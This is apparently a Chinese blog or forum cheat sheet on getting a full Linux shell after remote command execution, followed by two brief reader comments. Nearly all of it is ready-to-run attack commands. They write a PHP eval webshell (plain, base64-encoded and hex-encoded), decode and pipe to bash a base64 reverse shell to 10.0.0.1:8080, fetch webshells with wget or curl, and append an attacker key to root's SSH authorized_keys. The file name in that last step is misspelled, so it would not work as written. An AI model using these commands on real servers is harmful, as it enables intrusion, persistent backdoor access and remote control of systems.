直接echo写入webshell： echo "<?php eval($_POST[1]); ?>" > 1.php base64写入webshell echo "PD9waHAgZXZhbCgkX1BPU1RbMV0pOyA/Pg==" | base64 -d >1.php 重定向符号被转义时用base64+bash反弹 echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS84MDgwIDA+JjE=" | base64 -d | /bin/bash 利用hex写入webshell 先在自己Linux服务器上生成十六进制的字符串 (-ps) echo '<?php eval($_POST[1]); ?>' |xxd -ps 再将字符串还原为命令 (-r -ps) echo 3C3F706870206576616C28245F504F53545B315D293B203F3E|xxd -r -ps > 1.php 使用wget，curl等工具远程下载webshell 权限足够时，写入ssh公钥 echo 公钥内容 >> /root/.ssh/authroized_keys

RCE~获取完整shell（Linux）

45813

直接echo写入webshell：

echo "<?php eval($_POST[1]); ?>" > 1.php

base64写入webshell

echo "PD9waHAgZXZhbCgkX1BPU1RbMV0pOyA/Pg==" | base64 -d >1.php

重定向符号被转义时用base64+bash反弹

echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS84MDgwIDA+JjE=" | base64 -d | /bin/bash

利用hex写入webshell

先在自己Linux服务器上生成十六进制的字符串 (-ps)
echo '<?php eval($_POST[1]); ?>' |xxd -ps
再将字符串还原为命令 (-r -ps)
echo 3C3F706870206576616C28245F504F53545B315D293B203F3E|xxd -r -ps > 1.php

使用wget，curl等工具远程下载webshell
权限足够时，写入ssh公钥

echo 公钥内容 >> /root/.ssh/authroized_keys

40226

好像哪里不对劲 🤣

42227

厉飞雨 web端输入应该没问题的，命令行的话用单引号试试，echo '<?php eval($_POST[1]); ?>' > 1.php